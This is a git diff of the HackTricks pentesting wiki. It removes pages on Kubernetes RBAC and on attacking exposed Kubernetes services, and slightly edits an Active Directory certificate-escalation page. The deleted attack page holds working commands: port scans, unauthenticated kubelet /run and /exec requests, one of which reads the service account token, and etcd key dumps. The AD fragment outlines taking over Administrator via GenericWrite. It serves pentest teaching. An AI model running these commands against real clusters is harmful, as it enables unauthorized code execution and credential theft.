But to enable RBAC you can use something like: - -``` -kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options -``` - -# Templates - -In the template of a **Role** or a **ClusterRole** you will need to indicate the **name of the role**, the **namespace** (in roles) and then the **apiGroups**, **resources** and **verbs** of the role: - -* The **apiGroups** is an array that contains the different **API namespaces** that this rule applies to. For example, a Pod definition uses apiVersion: v1. _It can has values such as rbac.authorization.k8s.io or \[\*]_. -* The **resources** is an array that defines **which resources this rule applies to**. You can find all the resources with: `kubectl api-resources --namespaced=true` -* The **verbs** is an array that contains the **allowed verbs**. The verb in Kubernetes defines the **type of action** you need to apply to the resource. For example, the list verb is used against collections while "get" is used against a single resource. - -## Rules Verbs - -(_This info was taken from_ [_**here**_](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb)) - -| HTTP verb | request verb | -| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| POST | create | -| GET, HEAD | get (for individual resources), list (for collections, including full object content), watch (for watching an individual resource or collection of resources) | -| PUT | update | -| PATCH | patch | -| DELETE | delete (for individual resources), deletecollection (for collections) | - -Kubernetes sometimes checks authorization for additional permissions using specialized verbs. For example: - -* [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) - * `use` verb on `podsecuritypolicies` resources in the `policy` API group. 
-* [RBAC](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping) - * `bind` and `escalate` verbs on `roles` and `clusterroles` resources in the `rbac.authorization.k8s.io` API group. -* [Authentication](https://kubernetes.io/docs/reference/access-authn-authz/authentication/) - * `impersonate` verb on `users`, `groups`, and `serviceaccounts` in the core API group, and the `userextras` in the `authentication.k8s.io` API group. - -{% hint style="warning" %} -You can find **all the verbs that each resource support** executing `kubectl api-resources --sort-by name -o wide` -{% endhint %} - -## Examples - -{% code title="Role" %} -```yaml -apiVersion: rbac.authorization.k8s.io/v1 -kind: Role -metadata: - namespace: defaultGreen - name: pod-and-pod-logs-reader -rules: -- apiGroups: [""] - resources: ["pods", "pods/log"] - verbs: ["get", "list", "watch"] -``` -{% endcode %} - -{% code title="ClusterRole" %} -```yaml -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - # "namespace" omitted since ClusterRoles are not namespaced - name: secret-reader -rules: -- apiGroups: [""] - resources: ["secrets"] - verbs: ["get", "watch", "list"] -``` -{% endcode %} - -For example you can use a **ClusterRole** to allow a particular user to run: - -``` -kubectl get pods --all-namespaces -``` - -## **RoleBinding and ClusterRoleBinding** - -A **role binding** **grants the permissions defined in a role to a user or set of users**. It holds a list of subjects (users, groups, or service accounts), and a reference to the role being granted. A **RoleBinding** grants permissions within a specific **namespace** whereas a **ClusterRoleBinding** grants that access **cluster-wide**. - -{% code title="" %} -```yaml -piVersion: rbac.authorization.k8s.io/v1 -# This role binding allows "jane" to read pods in the "default" namespace. -# You need to already have a Role named "pod-reader" in that namespace. 
-kind: RoleBinding -metadata: - name: read-pods - namespace: default -subjects: -# You can specify more than one "subject" -- kind: User - name: jane # "name" is case sensitive - apiGroup: rbac.authorization.k8s.io -roleRef: - # "roleRef" specifies the binding to a Role / ClusterRole - kind: Role #this must be Role or ClusterRole - name: pod-reader # this must match the name of the Role or ClusterRole you wish to bind to - apiGroup: rbac.authorization.k8s.io -``` -{% endcode %} - -{% code title="ClusterRoleBinding" %} -```yaml -apiVersion: rbac.authorization.k8s.io/v1 -# This cluster role binding allows anyone in the "manager" group to read secrets in any namespace. -kind: ClusterRoleBinding -metadata: - name: read-secrets-global -subjects: -- kind: Group - name: manager # Name is case sensitive - apiGroup: rbac.authorization.k8s.io -roleRef: - kind: ClusterRole - name: secret-reader - apiGroup: rbac.authorization.k8s.io -``` -{% endcode %} - -**Permissions are additive** so if you have a clusterRole with β€œlist” and β€œdelete” secrets you can add it with a Role with β€œget”. 
So be aware and always test your roles and permissions and **specify what is ALLOWED, because everything is DENIED by default.** - -# **Enumerating RBAC** - -```bash -# Get current privileges -kubectl auth can-i --list -# use `--as=system:serviceaccount::` to impersonate a service account - -# List Cluster Roles -kubectl get clusterroles -kubectl describe clusterroles - -# List Cluster Roles Bindings -kubectl get clusterrolebindings -kubectl describe clusterrolebindings - -# List Roles -kubectl get roles -kubectl describe roles - -# List Roles Bindings -kubectl get rolebindings -kubectl describe rolebindings -``` - -## Abuse Role/ClusterRoles for Privilege Escalation - -{% content-ref url="../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md b/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md deleted file mode 100644 index fa39f6bc4..000000000 --- a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md +++ /dev/null @@ -1,240 +0,0 @@ -# Pentesting Kubernetes Services - -Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**. - -## Finding exposed pods with OSINT - -One way could be searching for `Identity LIKE "k8s.%.com"` in [crt.sh](https://crt.sh) to find subdomains related to kubernetes. Another way might be to search `"k8s.%.com"` in github and search for **YAML files** containing the string. - -## How Kubernetes Exposes Services - -It might be useful for you to understand how Kubernetes can **expose services publicly** in order to find them: - -{% content-ref url="exposing-services-in-kubernetes.md" %} -[exposing-services-in-kubernetes.md](exposing-services-in-kubernetes.md) -{% endcontent-ref %} - -## Finding Exposed pods via port scanning - -The following ports might be open in a Kubernetes cluster: - -| Port | Process | Description | -| --------------- | -------------- | ---------------------------------------------------------------------- | -| 443/TCP | kube-apiserver | Kubernetes API port | -| 2379/TCP | etcd | | -| 6666/TCP | etcd | etcd | -| 4194/TCP | cAdvisor | Container metrics | -| 6443/TCP | kube-apiserver | Kubernetes API port | -| 8443/TCP | kube-apiserver | Minikube API port | -| 8080/TCP | kube-apiserver | Insecure API port | -| 10250/TCP | kubelet | HTTPS API which allows full mode access | -| 10255/TCP | kubelet | Unauthenticated read-only HTTP port: pods, running pods and node state | -| 10256/TCP | kube-proxy | Kube Proxy health check server | -| 9099/TCP | calico-felix | Health check server for Calico | -| 6782-4/TCP | weave | 
Metrics and endpoints | -| 30000-32767/TCP | NodePort | Proxy to the services | -| 44134/TCP | Tiller | Helm service listening | - -### Nmap - -``` -nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 /16 -``` - -### Kube-apiserver - -This is the **API Kubernetes service** the administrators usually talk with using the tool **`kubectl`**. - -**Common ports: 6443 and 443**, but also 8443 in minikube and 8080 as insecure. - -``` -curl -k https://:(8|6)443/swaggerapi -curl -k https://:(8|6)443/healthz -curl -k https://:(8|6)443/api/v1 -``` - -**Check the following page to learn how to obtain sensitive data and perform sensitive actions talking to this service:** - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) -{% endcontent-ref %} - -### Kubelet API - -This service **runs in every node of the cluster**. It's the service that will **control** the pods inside the **node**. It talks with the **kube-apiserver**. - -If you find this service exposed you might have found an [**unauthenticated RCE**](pentesting-kubernetes-from-the-outside.md#kubelet-rce). - -#### Kubelet API - -``` -curl -k https://:10250/metrics -curl -k https://:10250/pods -curl -k https://:10250/runningpods/ -``` - -If the response is `Unauthorized` then it requires authentication. 
- -If you can list nodes you can get a list of kubelets endpoints with: - -```bash -kubectl get nodes -o custom-columns='IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port' | grep -v KUBELET_PORT | while IFS='' read -r node; do - ip=$(echo $node | awk '{print $1}') - port=$(echo $node | awk '{print $2}') - echo "curl -k --max-time 30 https://$ip:$port/pods" - echo "curl -k --max-time 30 https://$ip:2379/version" #Check also for etcd -done -``` - -#### kubelet (Read only) - -``` -curl -k https://:10255 -http://:10255/pods -``` - -### etcd API - -``` -curl -k https://:2379 -curl -k https://:2379/version -etcdctl --endpoints=http://:2379 get / --prefix --keys-only -``` - -### Tiller - -``` -helm --host tiller-deploy.kube-system:44134 version -``` - -You could abuse this service to escalate privileges inside Kubernetes: - -{% content-ref url="../../network-services-pentesting/44134-pentesting-tiller-helm.md" %} -[44134-pentesting-tiller-helm.md](../../network-services-pentesting/44134-pentesting-tiller-helm.md) -{% endcontent-ref %} - -### cAdvisor - -Service useful to gather metrics. - -``` -curl -k https://:4194 -``` - -### NodePort - -When a port is exposed in all the nodes via a **NodePort**, the same port is opened in all the nodes proxying the traffic into the declared **Service**. By default this port will be in the **range 30000-32767**. So new unchecked services might be accessible through those ports. - -``` -sudo nmap -sS -p 30000-32767 -``` - -## Vulnerable Misconfigurations - -### Kube-apiserver Anonymous Access - -By **default**, **kube-apiserver** API endpoints are **forbidden** to **anonymous** access. 
But it’s always a good idea to check if there are any **insecure endpoints that expose sensitive information**: - -![](https://www.cyberark.com/wp-content/uploads/2019/09/Kube-Pen-2-fig-5.png) - -### **Checking for ETCD Anonymous Access** - -The ETCD stores the cluster secrets, configuration files and more **sensitive data**. By **default**, the ETCD **cannot** be accessed **anonymously**, but it is always good to check. - -If the ETCD can be accessed anonymously, you may need to **use the** [**etcdctl**](https://github.com/etcd-io/etcd/blob/master/etcdctl/READMEv2.md) **tool**. The following command will get all the keys stored: - -``` -etcdctl --endpoints=http://:2379 get / --prefix --keys-only -``` - -### **Kubelet RCE** - -The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous access** to the service is **allowed:** - -![](<../../.gitbook/assets/image (637) (1) (1) (1).png>) - -The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**: - -```bash -curl -s https://raw.githubusercontent.com/kubernetes/kubernetes/master/pkg/kubelet/server/server.go | grep 'Path("/' - -Path("/pods"). -Path("/run") -Path("/exec") -Path("/attach") -Path("/portForward") -Path("/containerLogs") -Path("/runningpods/"). -``` - -All of them sound interesting. 
- -#### /pods - -This endpoint lists pods and their containers: - -```bash -curl -ks https://worker:10250/pods -``` - -#### /exec & /run - -This endpoint allows you to execute code inside any container very easily: - -```bash -# You can get all the namespaces, pods and containers running with: -curl -k https://10.10.11.133:10250/pods | jq -r '.items[] | [.metadata.namespace, .metadata.name, [.spec.containers[].name]]' -curl -k https://10.10.11.133:10250/runningpods/ | jq -r '.items[] | [.metadata.namespace, .metadata.name, [.spec.containers[].name]]' - -# /run -curl -XPOST -k https://10.10.11.133:10250/run/{namespace}/{pod}/{container} \ - -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt /var/run/secrets/kubernetes.io/serviceaccount/token" - -# /exec -# The command is passed as an array (split by spaces) and that is a GET request. -curl -sk -X POST -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" \ - https://worker:10250/exec/{namespace}/{pod}/{container} \ - -d 'input=1' -d 'output=1' -d 'tty=1' \ - -d 'command=ls' -d 'command=/' - -# Using kubeletctl -## get kubeletctl from releases in https://github.com/cyberark/kubeletctl -kubeletctl exec /bin/sh -n -p -c -s --cacert ./ca.crt -kubeletctl exec /bin/sh -p kube-proxy-84qt4 -c kube-proxy -n kube-system -s 10.129.227.136 --cacert ./ca.crt -``` - -To automate the exploitation you can also use the script [**kubelet-anon-rce**](https://github.com/serain/kubelet-anon-rce). - -{% hint style="info" %} -To avoid this attack the _**kubelet**_ service should be run with `--anonymous-auth false` and the service should be segregated at the network level. -{% endhint %} - -### **Checking Kubelet (Read Only Port) Information Exposure** - -When the **kubelet read-only port** is exposed, the attacker can retrieve information from the API. This exposes **cluster configuration elements, such as pod names, location of internal files and other configurations**. 
This is not critical information, but it still should not be exposed to the internet. - -For example, a remote attacker can abuse this by accessing the following URL: `http://:10255/pods` - -![](https://www.cyberark.com/wp-content/uploads/2019/09/KUbe-Pen-2-fig-6.png) - -## References - -{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2" %} - -{% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %} - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md index 019038ec7..14ed19a3e 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md +++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md @@ -473,7 +473,7 @@ In this case, `John@corp.local` has `GenericWrite` over `Jane@corp.local`, and w First, we obtain the hash of `Jane` with for instance Shadow Credentials (using our `GenericWrite`). -
+
Next, we change the `userPrincipalName` of `Jane` to be `Administrator`. Notice that we’re leaving out the `@corp.local` part. @@ -522,7 +522,7 @@ In this case, `John@corp.local` has `GenericWrite` over `Jane@corp.local`, and w First, we obtain the hash of `Jane` with for instance Shadow Credentials (using our `GenericWrite`). -
+
Next, we change the `userPrincipalName` of `Jane` to be `Administrator`. Notice that we’re leaving out the `@corp.local` part. @@ -553,7 +553,7 @@ In this case, `John@corp.local` has `GenericWrite` over `Jane@corp.local`, and w First, we obtain the hash of `Jane` with for instance Shadow Credentials (using our `GenericWrite`). -
+
Next, we change the `userPrincipalName` of `Jane` to be `DC$@corp.local`.